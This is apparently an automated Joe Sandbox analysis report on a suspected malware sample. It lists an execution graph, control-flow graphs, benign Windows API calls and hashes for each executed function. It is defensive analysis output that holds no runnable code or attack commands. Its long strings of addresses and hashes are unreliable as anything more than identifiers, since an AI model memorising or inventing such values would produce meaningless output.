                                                  execution_graph 29111 edaed8 DuplicateHandle 29112 edaf6e 29111->29112 29113 61500a0 29114 61500d5 29113->29114 29117 61500e5 29113->29117 29121 61500f0 29113->29121 29118 6150158 CreateWindowExW 29117->29118 29120 6150214 29118->29120 29120->29120 29122 6150158 CreateWindowExW 29121->29122 29124 6150214 29122->29124 29125 e0d01c 29126 e0d034 29125->29126 29127 e0d08e 29126->29127 29133 61502a1 29126->29133 29138 61502a8 29126->29138 29143 6150298 29126->29143 29148 6151408 29126->29148 29156 61513ff 29126->29156 29134 61502a8 29133->29134 29136 61513ff CallWindowProcW 29134->29136 29137 6151408 CallWindowProcW 29134->29137 29135 61502ef 29135->29127 29136->29135 29137->29135 29139 61502ce 29138->29139 29141 61513ff CallWindowProcW 29139->29141 29142 6151408 CallWindowProcW 29139->29142 29140 61502ef 29140->29127 29141->29140 29142->29140 29144 61502a4 29143->29144 29146 61513ff CallWindowProcW 29144->29146 29147 6151408 CallWindowProcW 29144->29147 29145 61502ef 29145->29127 29146->29145 29147->29145 29151 6151435 29148->29151 29149 6151469 29172 6150414 29149->29172 29151->29149 29152 6151459 29151->29152 29164 6151590 29152->29164 29168 615158f 29152->29168 29153 6151467 29153->29153 29157 6151408 29156->29157 29158 6151469 29157->29158 29160 6151459 29157->29160 29159 6150414 CallWindowProcW 29158->29159 29161 6151467 29159->29161 29162 6151590 CallWindowProcW 29160->29162 29163 615158f CallWindowProcW 29160->29163 29161->29161 29162->29161 29163->29161 29166 61515a4 29164->29166 29165 6151630 29165->29153 29176 6151648 29166->29176 29170 61515a4 29168->29170 29169 6151630 29169->29153 29171 6151648 CallWindowProcW 29170->29171 29171->29169 29173 615041f 29172->29173 29174 6152af9 29173->29174 29175 6152b4a CallWindowProcW 29173->29175 29174->29153 29175->29174 29177 6151659 29176->29177 29179 6152a90 29176->29179 29177->29165 29180 6150414 CallWindowProcW 29179->29180 29181 6152a9a 29180->29181 29181->29177 29099 6154c78 29100 6154ca0 29099->29100 29103 6154ccc 29099->29103 29101 6154ca9 29100->29101 29104 615407c 29100->29104 29105 6154087 29104->29105 29107 6154fc3 29105->29107 29108 6154098 29105->29108 29107->29103 29109 6154ff8 OleInitialize 29108->29109 29110 615505c 29109->29110 29110->29107 29182 edb690 29183 edb6be 29182->29183 29186 edaaec 29183->29186 29185 edb6de 29185->29185 29188 edaaf7 29186->29188 29187 edc667 29187->29185 29188->29187 29191 6155201 29188->29191 29195 6155210 29188->29195 29194 6155204 29191->29194 29192 61556d8 WaitMessage 29192->29194 29193 61552c2 29193->29187 29194->29192 29194->29193 29196 6155275 29195->29196 29197 61556d8 WaitMessage 29196->29197 29198 61552c2 29196->29198 29197->29196 29198->29187 29199 edac90 29200 edacd6 GetCurrentProcess 29199->29200 29202 edad28 GetCurrentThread 29200->29202 29203 edad21 29200->29203 29204 edad5e 29202->29204 29205 edad65 GetCurrentProcess 29202->29205 29203->29202 29204->29205 29208 edad9b 29205->29208 29206 edadc3 GetCurrentThreadId 29207 edadf4 29206->29207 29208->29206

                                                  Executed Functions

                                                  Function 06155210 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1078 6155210-6155273 1079 6155275-615529f 1078->1079 1080 61552a2-61552c0 1078->1080 1079->1080 1085 61552c2-61552c4 1080->1085 1086 61552c9-6155300 1080->1086 1088 6155782-6155797 1085->1088 1090 6155306-615531a 1086->1090 1091 6155731 1086->1091 1092 615531c-6155346 1090->1092 1093 6155349-6155368 1090->1093 1094 6155736-615574c 1091->1094 1092->1093 1100 6155380-6155382 1093->1100 1101 615536a-6155370 1093->1101 1094->1088 1102 6155384-615539c 1100->1102 1103 61553a1-61553aa 1100->1103 1105 6155374-6155376 1101->1105 1106 6155372 1101->1106 1102->1094 1107 61553b2-61553b9 1103->1107 1105->1100 1106->1100 1108 61553c3-61553ca 1107->1108 1109 61553bb-61553c1 1107->1109 1111 61553d4 1108->1111 1112 61553cc-61553d2 1108->1112 1110 61553d7-61553f4 call 61540f8 1109->1110 1115 6155549-615554d 1110->1115 1116 61553fa-6155401 1110->1116 1111->1110 1112->1110 1117 6155553-6155557 1115->1117 1118 615571c-615572f 1115->1118 1116->1091 1119 6155407-6155444 1116->1119 1120 6155571-615557a 1117->1120 1121 6155559-615556c 1117->1121 1118->1094 1127 6155712-6155716 1119->1127 1128 615544a-615544f 1119->1128 1122 615557c-61555a6 1120->1122 1123 61555a9-61555b0 1120->1123 1121->1094 1122->1123 1125 61555b6-61555bd 1123->1125 1126 615564f-6155664 1123->1126 1132 61555ec-615560e 1125->1132 1133 61555bf-61555e9 1125->1133 1126->1127 1142 615566a-615566c 1126->1142 1127->1107 1127->1118 1129 6155481-6155496 call 615411c 1128->1129 1130 6155451-615545f call 6154104 1128->1130 1140 615549b-615549f 1129->1140 1130->1129 1143 6155461-615547f call 6154110 1130->1143 1132->1126 1168 6155610-615561a 1132->1168 1133->1132 1144 61554a1-61554b3 call 6154128 1140->1144 1145 6155510-615551d 1140->1145 1146 615566e-61556a7 1142->1146 1147 61556b9-61556d6 call 61540f8 1142->1147 1143->1140 1172 61554b5-61554e5 1144->1172 1173 61554f3-615550b 1144->1173 1145->1127 1160 6155523-6155526 call 6154138 1145->1160 1163 61556b0-61556b7 1146->1163 1164 61556a9-61556af 1146->1164 1147->1127 1159 61556d8-6155704 WaitMessage 1147->1159 1165 6155706 1159->1165 1166 615570b 1159->1166 1171 615552b-615552d 1160->1171 1163->1127 1164->1163 1165->1166 1166->1127 1180 6155632-615564d 1168->1180 1181 615561c-6155622 1168->1181 1174 615553c-6155544 call 6154150 1171->1174 1175 615552f-6155537 call 6154144 1171->1175 1185 61554e7 1172->1185 1186 61554ec 1172->1186 1173->1094 1174->1127 1175->1127 1180->1126 1180->1168 1183 6155624 1181->1183 1184 6155626-6155628 1181->1184 1183->1180 1184->1180 1185->1186 1186->1173
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 833557c5644a7fb8071b53c4cf23fbeffc91d2cef9ce461e51fe2985cba3f6f0
                                                  • Instruction ID: 2f34e76491336a30b51edee11dc00484a1d35e5f216533f93571bb7af0402193
                                                  • Opcode Fuzzy Hash: 833557c5644a7fb8071b53c4cf23fbeffc91d2cef9ce461e51fe2985cba3f6f0
                                                  • Instruction Fuzzy Hash: A0F14B30E00349CFDB54DFA9C844B9DFBF2BF88314F568559E819AB265DBB0A945CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EDAC80 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 164 edac80-edad1f GetCurrentProcess 169 edad28-edad5c GetCurrentThread 164->169 170 edad21-edad27 164->170 171 edad5e-edad64 169->171 172 edad65-edad99 GetCurrentProcess 169->172 170->169 171->172 174 edad9b-edada1 172->174 175 edada2-edadbd call edae5f 172->175 174->175 177 edadc3-edadf2 GetCurrentThreadId 175->177 179 edadfb-edae5d 177->179 180 edadf4-edadfa 177->180 180->179
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00EDAD0E
                                                  • GetCurrentThread.KERNEL32 ref: 00EDAD4B
                                                  • GetCurrentProcess.KERNEL32 ref: 00EDAD88
                                                  • GetCurrentThreadId.KERNEL32 ref: 00EDADE1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745890984.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_ed0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 302af41989e0369649439c47662b862cf1d0c511f795efda8e32d440ce6ce73f
                                                  • Instruction ID: d076939d6ce6a71b5007f32032904b45ed0a2b050838c3cffd6a66a7806b285d
                                                  • Opcode Fuzzy Hash: 302af41989e0369649439c47662b862cf1d0c511f795efda8e32d440ce6ce73f
                                                  • Instruction Fuzzy Hash: DD5169B090034A8FDB14DFAAD548BAEBBF1FF88305F248059D509A73A0D774A945CF66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EDAC90 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 187 edac90-edad1f GetCurrentProcess 191 edad28-edad5c GetCurrentThread 187->191 192 edad21-edad27 187->192 193 edad5e-edad64 191->193 194 edad65-edad99 GetCurrentProcess 191->194 192->191 193->194 196 edad9b-edada1 194->196 197 edada2-edadbd call edae5f 194->197 196->197 199 edadc3-edadf2 GetCurrentThreadId 197->199 201 edadfb-edae5d 199->201 202 edadf4-edadfa 199->202 202->201
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00EDAD0E
                                                  • GetCurrentThread.KERNEL32 ref: 00EDAD4B
                                                  • GetCurrentProcess.KERNEL32 ref: 00EDAD88
                                                  • GetCurrentThreadId.KERNEL32 ref: 00EDADE1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745890984.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_ed0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: e61cc9fa7021d4c81283d6a96a7d59d4326d7ee8883bcc7358753559b9c7c1ae
                                                  • Instruction ID: 381601b792c5a76765b2c022c070caa1edeaf84bf3f96113d959ace4819194d3
                                                  • Opcode Fuzzy Hash: e61cc9fa7021d4c81283d6a96a7d59d4326d7ee8883bcc7358753559b9c7c1ae
                                                  • Instruction Fuzzy Hash: 685169B090034A8FDB14DFAAD448BAEBBF1EF88315F248019D509B77A0D774A945CF66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 061500E5 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1190 61500e5-6150156 1191 6150161-6150168 1190->1191 1192 6150158-615015e 1190->1192 1193 6150173-6150212 CreateWindowExW 1191->1193 1194 615016a-6150170 1191->1194 1192->1191 1196 6150214-615021a 1193->1196 1197 615021b-6150253 1193->1197 1194->1193 1196->1197 1201 6150255-6150258 1197->1201 1202 6150260 1197->1202 1201->1202 1203 6150261 1202->1203 1203->1203
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06150202
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 00976eb1c774c17740747f3f9435fa0516cea33225e70700608ada66cb3beb8d
                                                  • Instruction ID: 28da8366fa469f29972004dc821ef5adeba9112778f943ac6656f9ff5cfae860
                                                  • Opcode Fuzzy Hash: 00976eb1c774c17740747f3f9435fa0516cea33225e70700608ada66cb3beb8d
                                                  • Instruction Fuzzy Hash: 1851BDB5D00309DFDB14CFA9C984ADEFBB5BF48310F25812AE818AB210D7759945CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 061500F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1204 61500f0-6150156 1205 6150161-6150168 1204->1205 1206 6150158-615015e 1204->1206 1207 6150173-6150212 CreateWindowExW 1205->1207 1208 615016a-6150170 1205->1208 1206->1205 1210 6150214-615021a 1207->1210 1211 615021b-6150253 1207->1211 1208->1207 1210->1211 1215 6150255-6150258 1211->1215 1216 6150260 1211->1216 1215->1216 1217 6150261 1216->1217 1217->1217
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06150202
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: e5ed0f6ad5f0586b18c7b8e1c073d0402a67cf68adfdef064a5fac49e316b936
                                                  • Instruction ID: 9e2b30c674d282057fe5ef5711007fcae55f25379501b62371849e195d6fdf9a
                                                  • Opcode Fuzzy Hash: e5ed0f6ad5f0586b18c7b8e1c073d0402a67cf68adfdef064a5fac49e316b936
                                                  • Instruction Fuzzy Hash: 5B41B0B1D00349DFDB14CFAAC884ADEFBB5BF88310F25812AE818AB210D7759945CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06150414 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1218 6150414-6152aec 1221 6152af2-6152af7 1218->1221 1222 6152b9c-6152bbc 1218->1222 1223 6152af9-6152b30 1221->1223 1224 6152b4a-6152b82 CallWindowProcW 1221->1224 1228 6152bbf-6152bcc 1222->1228 1231 6152b32-6152b38 1223->1231 1232 6152b39-6152b48 1223->1232 1225 6152b84-6152b8a 1224->1225 1226 6152b8b-6152b9a 1224->1226 1225->1226 1226->1228 1231->1232 1232->1228
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 06152B71
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 3f079db067893937a638a35a5ff49b24fb04433c2acd8ae8488ce421150d63db
                                                  • Instruction ID: d5617ad88544beba8574e297744757e7ccf931440757b59fe03e5b6e62a07a49
                                                  • Opcode Fuzzy Hash: 3f079db067893937a638a35a5ff49b24fb04433c2acd8ae8488ce421150d63db
                                                  • Instruction Fuzzy Hash: 9E4129B9A00309CFDB14DF59C888AAAFBF5FB88314F25C459D519A7321D774A941CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EDAED0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1234 edaed0-edaf6c DuplicateHandle 1235 edaf6e-edaf74 1234->1235 1236 edaf75-edaf92 1234->1236 1235->1236
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EDAF5F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745890984.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_ed0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 36a016d455593f722ec40c20ee64a2d342db02b2a0e54fce1f6feb6b83ade63c
                                                  • Instruction ID: e51172c56e6690818d1c8542e9daac645ed6da21fc18268dda41518a4b7a4eeb
                                                  • Opcode Fuzzy Hash: 36a016d455593f722ec40c20ee64a2d342db02b2a0e54fce1f6feb6b83ade63c
                                                  • Instruction Fuzzy Hash: 4A21F4B5D002499FDB10CFAAD484ADEBFF4EB48320F14801AE954A3350D374A941CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EDAED8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1239 edaed8-edaf6c DuplicateHandle 1240 edaf6e-edaf74 1239->1240 1241 edaf75-edaf92 1239->1241 1240->1241
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EDAF5F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745890984.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_ed0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 9f1804b068e1b1b672fc4638a5d5c67bd40093c6e9cd5408c45ca8055f0c7f8c
                                                  • Instruction ID: 28c3bae3aa3ca2d3c51a0ea7271f4d3be4811815815b1e160765556b8e39c232
                                                  • Opcode Fuzzy Hash: 9f1804b068e1b1b672fc4638a5d5c67bd40093c6e9cd5408c45ca8055f0c7f8c
                                                  • Instruction Fuzzy Hash: 3521B3B59002499FDB10CFAAD884ADEBBF9EB48710F14841AE914A3350D378A955CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06154FF0 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1244 6154ff0-6154ff4 1245 6154ff8-615505a OleInitialize 1244->1245 1246 6155063-6155080 1245->1246 1247 615505c-6155062 1245->1247 1247->1246
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 0615504D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: a71e48868d1f4fd6962237209a5dc622f6973258cc82941c63dcd00ff8052d46
                                                  • Instruction ID: c10b33a60a46498f7b8cd17d63c5edeeec097c834a7ed12c56ddd755936b02c5
                                                  • Opcode Fuzzy Hash: a71e48868d1f4fd6962237209a5dc622f6973258cc82941c63dcd00ff8052d46
                                                  • Instruction Fuzzy Hash: FC1106B5800349CFDB20DFAAD844BCEFFF8AB48224F24845AD558A7210D379A544CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06154098 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 0615504D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 99f9fa2b3688c225a4223dc82c1570687f86d1e3944926a1c5e4fbd64e711ada
                                                  • Instruction ID: b57b7f49e9d1db5e208729411ba0b17751864a4a736e0f8b87036316fe8481e3
                                                  • Opcode Fuzzy Hash: 99f9fa2b3688c225a4223dc82c1570687f86d1e3944926a1c5e4fbd64e711ada
                                                  • Instruction Fuzzy Hash: AA1133B4800349CFDB20DFAAD484B9EFBF4EB48224F20841AD528A3200C778A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E0D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745314546.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_e0d000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f2743064614a79b7171a4be84a74950e33d99cd1d87e5c9cc769ddb566cce1c
                                                  • Instruction ID: e1d6ce6581eba24d3d9b2845404267e8d12bbaab98425ae784b053932cefcf32
                                                  • Opcode Fuzzy Hash: 2f2743064614a79b7171a4be84a74950e33d99cd1d87e5c9cc769ddb566cce1c
                                                  • Instruction Fuzzy Hash: 4F21D075608304DFDB14DF54D984B16BB66FB84328F20C569D84E5B286C33AD887CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E0D005 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745314546.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_e0d000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 170db237b2d36619eebe5bfcde8d2880bdd5ad2fdeea6ac6b8bf807eed1f493a
                                                  • Instruction ID: cac9da8954b2a968820b44a9ab87d76900bff9ff1deaa03f85abc650a2d63929
                                                  • Opcode Fuzzy Hash: 170db237b2d36619eebe5bfcde8d2880bdd5ad2fdeea6ac6b8bf807eed1f493a
                                                  • Instruction Fuzzy Hash: 0D21537550D3808FC712CF64D994715BF72EB46314F28C5DAD8498B6A7C33A984ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00CED628 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745135646.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_ced000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b9a1c2b3deda6dfdbe702e8f5d5408e53906bd36f7433048d717908a4d16ec3
                                                  • Instruction ID: 1458d81d0316a7cb4bad9ea375dcc525b066d1558c271f45fce6e74f84fe6e6b
                                                  • Opcode Fuzzy Hash: 1b9a1c2b3deda6dfdbe702e8f5d5408e53906bd36f7433048d717908a4d16ec3
                                                  • Instruction Fuzzy Hash: 40F0C2714043849EE7208A16C884B62FFECEF41734F18C45AFD1D4A287C2799844CAB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%